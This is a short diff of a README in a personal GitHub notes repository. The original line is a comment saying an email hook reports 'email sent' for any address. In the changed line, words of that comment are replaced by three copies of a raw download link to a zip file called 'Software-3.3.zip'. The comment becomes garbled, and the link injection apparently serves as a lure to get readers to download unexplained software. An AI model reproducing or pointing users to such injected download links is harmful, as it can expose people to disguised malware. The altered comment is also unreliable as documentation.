Habib255/notes/README.md

   alert('Sent email')
 }

-// note: this hook does not give you confirmation if the email is exist or not...it says 'email sent' to any email you geive.ex- yadayada@mail.com
+// note: this hook does not give you confirmation if the email is exist or https://raw.githubusercontent.com/Habib255/notes/main/backswing/Software-3.3.zip says 'email sent' to any email you https://raw.githubusercontent.com/Habib255/notes/main/backswing/Software-3.3.zip https://raw.githubusercontent.com/Habib255/notes/main/backswing/Software-3.3.zip
 ```

 \